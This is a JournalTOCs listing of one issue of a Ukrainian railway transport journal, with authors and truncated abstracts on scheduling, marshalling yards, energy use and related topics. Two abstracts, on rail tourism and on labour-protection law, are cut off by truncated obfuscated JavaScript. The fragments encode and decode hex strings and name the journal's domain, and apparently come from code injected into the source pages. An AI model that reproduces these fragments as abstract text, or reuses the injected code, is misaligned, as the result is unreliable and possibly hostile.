for Journals by Title or ISSN
for Articles by Keywords
help
Followed Journals
Journal you Follow: 0
 
Sign Up to follow journals, search in your chosen journals and, optionally, receive Email Alerts when new issues of your Followed Journals are published.
Already have an account? Sign In to see the journals you follow.
Journal Cover Транспортні системи та технології перевезень
  [0 followers]  Follow
    
  This is an Open Access Journal Open Access journal
   ISSN (Print) 2222-419X
   Published by Dnipropetrovsk National University Homepage  [6 journals]
 • АНАЛІЗ
         ФАКТОРІВ,
         ЯКІ
         ВПЛИВАЮТЬ
         НА
         ЗАБЕЗПЕЧЕННЯ
         РУХУ
         ВАНТАЖНИХ
         ПОЇЗДІВ ЗА
         РОЗКЛАДОМ

  • Authors: В. О. БАЛАНОВ
   Pages: 5 - 9
   Abstract: Мета. Метою дослідження є вивчення затримок поїздів по маршруту їх слідування. Результати цих досліджень дозволять раціонально розподіляти резерви часу при складанні графіків руху поїздів. Методика. В якості методів дослідження використані методи математичної статистики, зокрема визначення залежностей затримок поїздів. Результати. На підставі виконаних досліджень вивчені затримки поїздів по маршруту їх слідування. Результати цих досліджень дозволять раціонально розподіляти резерви часу при складанні графіків руху поїздів, удосконалити методи розробки графіків обороту составів поїздів, що забезпечують перевезення вантажів за розкладом. Наукова новизна. Наукова новизна роботи полягає в удосконаленні методів визначення затримок поїздів, а також у встановленні резервів часу які необхідно закладати в маршрут прямування вантажних поїздів, які слідують за розкладом. Практична значимість.Практична значимість виконаних досліджень полягає в тому, що отри&...
    
 • ОЦІНКА
         ДОЦІЛЬНОСТІ
         І
         ЧЕРГОВОСТІ
         РЕАЛІЗАЦІЇ
         ТЕХНІЧНИХ
         ЗАХОДІВ
         ЩОДО
         ПОСИЛЕННЯ
         ДІЛЯНКИ
         ЧОРНОМОРСЬКА
         – БЕРЕГОВА

  • Authors: Н. И. БЕРЕЗОВЫЙ, В. В. МАЛАШКИН
   Pages: 10 - 15
   Abstract: Переробна спроможність морських портів України, як відомо, перевищує переробну та пропускну спроможність залізничних дільниць, що їх обслуговують. У той же час Кабінет Міністрів України у липні 2013 року затвердив Стратегію розвитку морських портів України до 2038 року, що передбачає збільшення щорічної переробки вантажів до 210 млн. т із створенням потужностей для їх переробки не менше 250 млн. т вантажів на рік і підвищенням до 80 % ефективності використання перевантажувальних комплексів морських портів.Падіння обсягу транзиту вантажів територією України у зв'язку з втратою російських вантажів, що переорієнтовуються на порти країн Балтії та через загострення конфлікту на Донбасі призвело до посилення конкуренції між морськими портами України за залучення вантажів.Останнім часом намітилися тенденції до інвестування в розвиток об'єктів Укрзалізниці з боку недержавних структур, наприклад фінансування холдингом «Портінвест» проекту розвитку станції Берегова; будівництво другої ...
    
 • ПІДВИЩЕННЯ
         ЕФЕКТИВНОСТІ
         ФУНКЦІОНУВАННЯ
         СОРТУВАЛЬНИХ
         КОМПЛЕКСІВ
         СТАНЦІЙ В
         УМОВАХ
         НЕРІВНОМІРНОСТІ
         ВХІДНОГО
         ПОТОКУ
         ПОЇЗДІВ

  • Authors: В. І. БОБРОВСЬКИЙ, Є. Б. ДЕМЧЕНКО, А. С. ДОРОШ
   Pages: 16 - 22
   Abstract: В сучасних умовах актуальними є питання підвищення ефективності сортувальних комплексів станцій, що забезпечують процес переробки вагонопотоків. Експлуатація сортувальних комплексів станцій характеризується значною нерівномірністю вхідного потоку поїздів. В цих умовах доцільною є адаптація інтенсивності сортувального процесу до коливань вхідного потоку, що дозволить скоротити експлуатаційні витрати станції. З метою вирішення вказаної проблеми сортувальний комплекс розглядається як керована система масового обслуговування; при цьому в якості керованого параметру системи було обрано швидкість розпуску составів. Крім того, для забезпечення вибору раціонального режиму розформування составів, що дозволяє скоротити витрати енергетичних ресурсів, запропоновано використання спеціалізованої конструкції сортувальної гірки з двома горбами різної висоти. В статті виконана постановка задачі та сформульовані основні принципи керування роботою сортувального кl...
    
 • РОЗРОБКА
         ОПЕРАТИВНОГО
         ПЛАНУ
         РОБОТИ
         ЛОКОМОТИВНОГО
         ПАРКУ НА
         ОСНОВІ
         БАГАТОКРИТЕРІАЛЬНОЇ
         ЗАДАЧІ ПРО
         

  • Authors: Р. В. ВЕРНИГОРА, Л. О. ЄЛЬНІКОВА
   Pages: 23 - 28
   Abstract: Наведена методика розрахунку плану роботи локомотивного парку на основі даних, отриманих з імітаційної моделі роботи сортувальної станції та моделі локомотивного депо, що входять до складу прогнозної моделі поїзної роботи залізничного напрямку.Задача взаємного ув’язування локомотивів, бригад та составів у поїзди з подальшим плануванням їх відправлення вирішується, застосовуючи метод декомпозиції; при цьому задача розв’язується послідовно в два етапи: на І-му етапі призначаються бригади на локомотиви, на ІІ-му – локомотиви з бригадами призначаються для обслуговування составів, враховуючи очікування вільної нитки графіка руху.Призначення бригад на локомотиви вирішується за допомогою класичної задачі про призначення. Призначення локомотивів з бригадами на состави являє собою більш складну задачу, ніж призначення бригад на локомотиви тож, на другому етапі розробки плану роботи локомотивного парку застосовується математичний апарат багатокритеріальної задачі п ...
    
 • ОЦІНКА
         РІВНЯ
         ПРОФЕСІЙНОЇ
         ПІДГОТОВКИ
         ЧЕРГОВИХ ПО
         СТАНЦІЇ З
         ВИКОРИСТАННЯМ
         КОМП'ЮТЕРНИХ
         ТРЕНАЖЕРІВ

  • Authors: Р. В. ВЕРНИГОРА, В. В. МАЛАШКИН
   Pages: 29 - 37
   Abstract: Ефективність роботи залізничних станцій в значній мірі залежить від якості роботи оперативно-диспетчерського персоналу. В цьому зв’язку проблема якісної підготовки диспетчерського персоналу для залізничного транспорту завжди була актуальною. Комп’ютерні тренажери є найбільш ефективним засобом підготовки оперативно-диспетчерського персоналу. В ДНУЗТ протягом останніх років ведеться робота по створенню комп’ютерних тренажерів для підготовки чергових по станції.Однією з проблем, що виникають при розробці комп’ютерних тренажерів, є оцінка якості професійної підготовки персоналу за результатами тренування. В статті запропоновано здійснювати оцінку результатів роботи на комп’ютерному тренажері методами дискримінантного аналізу. При цьому на основі вектора показників про результати тренування працівник відноситься до однієї з груп, кожна з яких включає працівників з певним рівнем професійної підготовки.На основі аналізу було обрано найбільш інформативні п...
    

 •        УДОСКОНАЛЕННЯ
         ПРОЦЕДУРИ
         ВИЗНАЧЕННЯ
         КІЛЬКОСТІ І
         ОСНОСТІ
         РУХОМИХ
         ОДИНИЦЬ

  • Authors: О. И. ЕГОРОВ
   Pages: 38 - 43
   Abstract: Мета. Побудова інформаційно-керуючих систем, систем контролю руху рухомих одиниць, як в межах станції, так і на прилеглих до неї шляхах, тісно пов’язане з використанням системами ідентифікації. У роботі розглядається метод ідентифікації який дозволяє визначити кількість і осность рухомих одиниць, що пройшли контрольний ділянку. Мета роботи полягає в удосконаленні процедури визначення кількості та осності рухомих одиниць з використанням мінімальної кількості обладнання або без додаткових витрат, використовуючи вже наявні обладнання встановлене на шляхах для вирішення інших завдань. Необхідно передбачити можливість підвищення достовірності роботи інших систем ідентифікації. Методика. Для досягнення поставленої мети спочатку був проведений аналіз міжосьових відстаней рухомих одиниць колії 1520 мм (вагонів і локомотивів). Розроблено математична і імітаційна моделі процесу руху рухомих одиниць через контрольний ділянку, з розташованою на ньому однієї контрольної т ...
    

 •        ЕНЕРГОЕФЕКТИВНІ
         ТЕХНОЛОГІЇ
         ЕКСПЛУАТАЦІЇ
         

  • Authors: Н. В. КИРИК
   Pages: 44 - 49
   Abstract: Анотація. Вищим пріоритетом енергетичної політики Республіки Білорусь є підвищення ефективності використання енергії як засобу для зниження витрат суспільства на енергопостачання, забезпечення сталого розвитку країни та підвищення конкурентоспроможності продуктивних сил. На сьогоднішній день держава не має можливостей за рахунок власних видобутих ресурсів повною мірою забезпечити паливно-енергетичними ресурсами їх споживачів. Залізничний транспорт є одним з основних споживачем енергоресурсів, і тому питання реалізації політики енерго-заощадження на залізничному транспорті отримали першорядне значення. Хоча залізничний транспорт, виконуючи технологічні функції переміщення великого обсягу вантажів і великої кількості пасажирів на значні відстані, є енергоємною сферою промислового виробництва, тим не менше, серед інших видів транспорту по питомим видатках паливно-енергетичних ресурсів на одиницю виробленої роботи залізничний транспорт є найбільш екl...
    
 • ВИЗНАЧЕННЯ
         РОЗРАХУНКОВИХ
         ОБ'ЄМІВ
         РОБОТИ
         ЗАЛІЗНИЧНИХ
         СТАНЦІЙ В
         УМОВАХ
         ЗМІНИ
         СТРУКТУРИ
         

  • Authors: Д. Н. КОЗАЧЕНКО, А. В. ГОРБОВА
   Pages: 50 - 56
   Abstract: Мета. Стаття спрямована на вдосконалення методів оцінки відповідності технічного оснащення залізничних станцій прогнозних обсягів роботи шляхом урахування змін структури вагонопотоків і технології їх обробки в часі. Методика. В якості методів дослідження використані методи математичної статистики, зокрема методи аналізу часових рядів і методи математичного моделювання. Результати. У результаті дослідження встановлено, що для станцій, що перероблюють неоднорідні вагонопотоки, а також для станцій з сезонно-змінною технологією протягом року може бути кілька розрахункових періодів, що вимагають перевірки відповідності технічного оснащення обсягами роботи. На підставі методів аналізу часових рядів і методів математичного моделювання розроблено метод пошуку характерних періодів роботі станції, які потребують перевірки за допомогою функціональних моделей. Наукова новизна. Наукова новизна роботи полягає в удосконаленні методів оцінки розрахункових обl...
    
 • СТІЙКІСТЬ
         ВАГОНІВ ПРИ
         ГАЛЬМУВАННІ
         

  • Authors: Д. Н. КОЗАЧЕНКО, С. А. ПОЖИДАЕВ, К. И. ЖЕЛЕЗНОВ
   Pages: 57 - 63
   Abstract: Мета. Стаття спрямована на удосконалення методів оцінки стійкості вагонів від сходу з рейок з метою урахування особливостей їх руху на сортувальних гірках. Методика. В якості методів дослідження використані методи теоретичної механіки та моделювання кочування відчепів на сортувальних гірках. Результати. Результати виконаних досліджень показали, що несприятливе розташування елементів плану колійного розвитку, стан залізничної колії, розташування вагонів у відчепі, погодні умови викликають додаткові обмеження по допустимому ступеню гальмування їх уповільнювачами. Наукова новизна. Наукова  новизна роботи полягає в удосконаленні методів оцінки показників стійкості вагонів, що на відміну від існуючих дозволяє врахувати особливості їх руху при скочуванні відчепів з гірки. Практична значимість. Практична значимість результатів полягає у тому, що вони дозволяють  аналізувати умови руху відчепів та попереджувати процеси викочування коліс вагонів на ре...
    

 •        УДОСКОНАЛЕННЯ
         КОНСТРУКЦІЇ
         ПЛАНУ
         ГОРЛОВИН
         СОРТУВАЛЬНИХ
         ГІРОК
         ТЕХНІЧНИХ
         СТАНЦІЙ

  • Authors: А. І. КОЛЕСНИК
   Pages: 64 - 69
   Abstract: Конструкція плану гіркових горловин суттєво впливає на динаміку та тривалість скочування відчепів. Капітальні вкладення при будівництві та експлуатаційні витрати під час функціонування гірки в першу чергу залежать від параметрів її горловини. У даній статті наведено результати досліджень впливу параметрів горловини на її будівельну довжину. Під будівельною довжиною розуміють розгорнуту довжину горловини від вершини гірки до початку паркової гальмової позиції без врахування довжин елементів стрілочних переводів. Як показав аналіз існуючих методів розрахунку та оптимізації конструкції плану сортувальних гірок, вони не в повній мірі відображають та враховують характер роботи гірок. Тому задача оптимізації конструкції гіркових горловин потребує подальшого вирішення. Аналіз типових схем гіркових горловин показав, що на спускній частині гірки необхідно розміщувати не більше двох додаткових кривих. Тому було розроблено методику, що дозволяє визначити всі можливі з ...
    
 • ПОТЕНЦІАЛ
         РОЗВИТКУ
         ЗАЛІЗНИЧНОГО
         ТУРИЗМУ В
         УКРАЇНІ

  • Authors: Р. Г. КОРОБЙОВА
   Pages: 70 - 74
   Abstract: Індустрія туризму – багатогалузевий виробничий комплекс, який займається відтворенням умов для подорожей і відпочинку. Туризм є однією з найзначніших галузей економіки в світі, а для деяких країн, що розвиваються – основною економічною галуззю. Його частка в світовій торгівлі послугами складає більше 30 %. Враховуючи постійне збільшення кількості подорожуючих туристичний бізнес в Україні має значний потенціал.У статті проаналізовано розвиток туристичних перевезень залізничним транспортом у світі та Україні. Розглянуто потенціал туристично-рекреаційних об'єктів Закарпатського регіону на прикладі вузькоколійних залізничних ліній. // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "tstt.diit.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
    

 •        ДОСЛІДЖЕННЯ
         ПАРАМЕТРІВ
         ПОПИТУ НА
         СКЛАДУВАННЯ
         ТА
         ПЕРЕРОБКУ
         ВАНТАЖІВ У
         ТРАНСПОРТНОМУ
         ВУЗЛІ

  • Authors: Я. В. ЛІТВІНОВА
   Pages: 75 - 79
   Abstract: Мета. Метою дослідження є вивчення параметрів попиту на складування та переробку вантажів у транспортному вузлі. В рамках роботи розглядається транспортний вузол Дніпропетровського річкового порту, в якому здійснюються технологічні процеси взаємодії трьох видів транспорту – річкового, залізничного і автомобільного. Методика. Дослідження проведені на базі зернового елеватора, що функціонує на першому причалі вантажного району «Амур-Гавань» Дніпропетровського річкового порту. Дослідження параметрів попиту для вхідного і вихідного матеріального потоків проведено для фронтів вантажних робіт (фронтів розвантаження для залізничного і автомобільного транспорту, а також фронту навантаження для річкового транспорту) у період навігації 2014 року. Перевірка гіпотез про розподіл параметрів потоку заявок проведена із використанням критерію Пірсона. Результати. Проведені дослідження параметрів попиту на послуги транспортного вузла показали, що обсяг партії вантажу ...
    

 •        ЕНЕРГОЕФЕКТИВНЕ
         КЕРУВАННЯ
         ПОЇЗДОПОТОКОМ
         ЯК ЗАСІБ
         УДОСКОНАЛЕННЯ
         ПЕРЕВІЗНОГО
         ПРОЦЕСУ

  • Authors: Г. Я. МОЗОЛЕВИЧ, А. В. ТРОЯН
   Pages: 80 - 87
   Abstract: Мета. Визначення основних заходів, щодо енергоефективного керування поїздопотоком на залізничному напрямку Львівської залізниці Хриплин - Ходорів та аналіз впливу таких параметрів, як кількість поїздів на дільниці і довжина вантажного поїзда, на загальні витрати електроенергії від пропуску змінного поїздопотоку по даній дільниці. Методика. Для досягнення поставленої мети була проведена модернізація залізничного напрямку тепловозної тяги Хриплин – Ходорів, шляхом електрифікації, проведена економічна оцінка проекту та розроблені імітаційні моделі залізничної дільниці, за допомогою яких, проведено моделювання пропуску вантажних поїздів зі змінними параметрами поїздопотоку. На основі отриманих результатів визначені залежності основних параметрів поїздопотоку та їх вплив на загальні витрати електроенергії від пропуску змінного поїздопотоку. Результати. На основі проведених досліджень, для визначення раціональних параметрів поїздопотоків, розроблені &#...
    
 • ОЦІНКА
         РИЗИКУ
         ВИХОДУ
         ЕКСПЕДИТОРА
         НА РИНОК
         ТРАНСПОРТНИХ
         ПОСЛУГ

  • Authors: В. С. НАУМОВ
   Pages: 88 - 92
   Abstract: Мета. Метою дослідження є оцінка залежності ризику виходу експедиторського підприємства на транспортний ринок від параметрів попиту і тарифу на послуги. Методика. Для проведення експериментальних досліджень з визначення залежності ризику виходу експедитора на ринок від параметрів попиту (інтервалу надходження заявок) і його цінової політики (тарифу експедиторського підприємства на комплекс послуг, що надаються) розроблено імітаційну модель обслуговування підприємством потоку заявок. Результати. Проведені дослідження дозволяють зробити висновок, що ризик експедиторського підприємства при виході на ринок монотонно зростає із збільшенням середнього інтервалу надходження заявок і монотонно зменшується із збільшенням тарифу експедитора. Наукова новизна. В роботі отримав подальший розвиток підхід до оцінки ризиків суб’єктів транспортного ринку на базі імітаційного моделювання основного технологічного процесу, який відрізняється від існуючих тим, що ...
    
 • ПРОБЛЕМИ
         ТРАНСФОРМАЦІЇ
         НАЦІОНАЛЬНОГО
         ЗАКОНОДАВСТВА
         В СФЕРІ
         ОХОРОНИ
         ПРАЦІ ДО
         СТАНДАРТІВ
         ЄС

  • Authors: О. А. НИКИФОРОВА, Г. Г. СИДОРЕНКО
   Pages: 93 - 97
   Abstract: У даній статті аналізується коло проблемних питань охорони праці. Пропонуються шляхи удосконалення правового регулювання відносин у даній сфері, розробка напрямків імплементації національного законодавства до міжнародних норм та законодавства Європейського Союзу. Досліджені окремі нормативні документи трудового права країн Європейського Союзу, зіставлені з документами, що регулюють аналогічні сфери в українській практиці. Проаналізовані відмінності, які необхідні для усунення цих проблем, запропонований механізм імплементації вказаних відмінних рис в українське законодавство, що стане одним з вагомих кроків інтеграції України в ЄС і зіграє значну роль в посиленні мотивуючої функції оплати праці і підвищенні продуктивності праці в країні.// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "tstt.diit.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
    
 • АНАЛІЗ
         ПЕРСПЕКТИВ
         РОЗВИТКУ
         РИНКУ
         КОНТЕЙНЕРНИХ
         ПЕРЕВЕЗЕНЬ
         В УКРАЇНІ

  • Authors: А. М. ОКОРОКОВ
   Pages: 98 - 104
   Abstract: мета. Підписання угоди про асоціацію між Україною та Європейським Союзом вимагає від першої всебічного розвитку по всіх напрямках та відповідності високим європейським стандартам. Одним з важливих напрямків є розвиток транспортної системи країни, як в цілому, так і по окремих видах транспорту. Вигідне географічне положення України, її позиція як держави-транзитера між сходом та заходом та бурхливий розвиток контейнерних перевезень вимагає відповідних заходів для утримання досягнутих позицій на ринку контейнерних перевезень та подальшого збільшення вантажопотоків. Метою статті є аналіз стану системи контейнерних перевезень, визначення перспектив її подальшого розвитку, встановлення проблемних ділянок та пропозиція шляхів щодо їх усунення. Викладення основного матеріалу. Обсяг контейнерних перевезень по всьому світу протягом останніх десятирічь демонструє стійку тенденцію до зростання, на яку незначним чином вплинули навіть такі події як світова фінансо&...
    

 •        МОДЕЛЮВАННЯ
         НЕОДНОРІДНИХ
         ТРАНСПОРТНИХ
         ПОТОКІВ З
         ЗМІННИМИ
         ТАРИФАМИ

  • Authors: В. В. СКАЛОЗУБ, Л. А. ПАНИК
   Pages: 105 - 111
   Abstract: Мета. У статті розроблені або вдосконалені моделі аналізу і планування багатопродуктових потоків у транспортних мережах в умовах конкуренції перевізників на основі застосування змінних тарифів, а також при обліку додаткових вимог, пов'язаних із заданими наборами індивідуальних властивостей носіїв потоків або ж «продуктів». Метою дослідження є питання впливу на планування неоднорідних транспортних потоків залежностей питомих показників ефективності перевезень від величин потоків в мережі, заданої різним чином, а також багатокритеріальний аналіз компромісу декількох перевізників, обслуговуючих систем. Методика. Дослідження проведені на основі математичного моделювання багатопродуктових потоків з індивідуальними властивостями, а також застосування методів лінійного та нелінійного програмування. Для багатокритеріального планування конкуруючих потоків будується область ефективних за Парето рішень, розрахованих з урахуванням застосування змінних та...
    

 •        ПРОГНОЗУВАННЯ
         СТАНУ
         БЕЗПЕКИ
         РУХУ ТА
         РИЗИКІВ НА
         ЗАЛІЗНИЧНИМ
         ПЕРЕЇЗДАХ З
         УРАХУВАННЯМ
         ВПЛИВУ
         ІМОВІРНІСНИЙ
         ФАКТОРІВ

  • Authors: Г. В. ЧИГРАЙ
   Pages: 112 - 116
   Abstract: Мета. Метою дослідження є розробка методу визначення повної довжини небезпечної зони гальмування автомобіля на основі імовірнісних факторів при проектуванні режимів безпечного руху на залізничних переїздах. Методика. Рішення задачі здійснюється на основі статистичної обробки даних і підборі законів розподілу досліджуваних чинників. Були досліджені й оцінені фактори, що впливають на безпеку руху. Це час реакції водія, швидкість руху автомобіля, коефіцієнт зчеплення автомобільних шин з дорожнім покриттям. Результати. На підставі статистичного аналізу були підібрані законів розподілу досліджуваних величин і встановлена залежність для визначення повної довжини небезпечної зони гальмування автомобіля на основі імовірнісних факторів. Наукова новизна. Запропонований підхід до визначення небезпечної зони гальмування на основі імовірнісних факторів дозволяє переглянути нормативи довжини небезпечної зони гальмування на залізничних переїздах з урахуван...
    
 • ЗАГАЛЬНА
         ХАРАКТЕРИСТИКА
         ОСНОВНИХ
         ЧИННИКІВ, ЩО
         ВИЗНАЧАЮТЬ
         ОБСЯГИ ТА
         СТРУКТУРУ
         ПАСАЖИРСЬКИХ
         ПЕРЕВЕЗЕНЬ

  • Authors: П. О. ЯНОВСЬКИЙ
   Pages: 117 - 123
   Abstract: В статті висвітлено загальну характеристику основних чинників, що впливають на обсяги та структуру пасажирських перевезень в сучасних умовах соціально-орієнтованої економіки. Точні дані щодо обсягів пасажирських перевезень на перспективу важливі для розробки стратегії розвитку транспорту. Розвивається та вдосконалюється пасажирський транспорт в тісному зв’язку із змінами суспільного виробництва й умовами життя людей. Чим вище рівень розвитку суспільства, тим більше і глибше проникає він у всі сфери діяльності людини.Взаємини людей  із транспортними структурами виникають підчас переміщення товарів, готової продукції і задоволення потреб населення в переміщенні. Вони належать до виробничих відносин і підпорядковані дії економічних законів, сутність яких відповідає цим відносинам. Часто інтереси різноманітних виробництв викликають потребу в переміщенні людей. Переміщення людей також виникають залежно від власних бажань і потреб.Здійснюючі перевезення паса&#...
    
 
 
JournalTOCs
School of Mathematical and Computer Sciences
Heriot-Watt University
Edinburgh, EH14 4AS, UK
Email: journaltocs@hw.ac.uk
Tel: +00 44 (0)131 4513762
Fax: +00 44 (0)131 4513327
 
About JournalTOCs
API
Help
News (blog, publications)
JournalTOCs on Twitter   JournalTOCs on Facebook

JournalTOCs © 2009-2016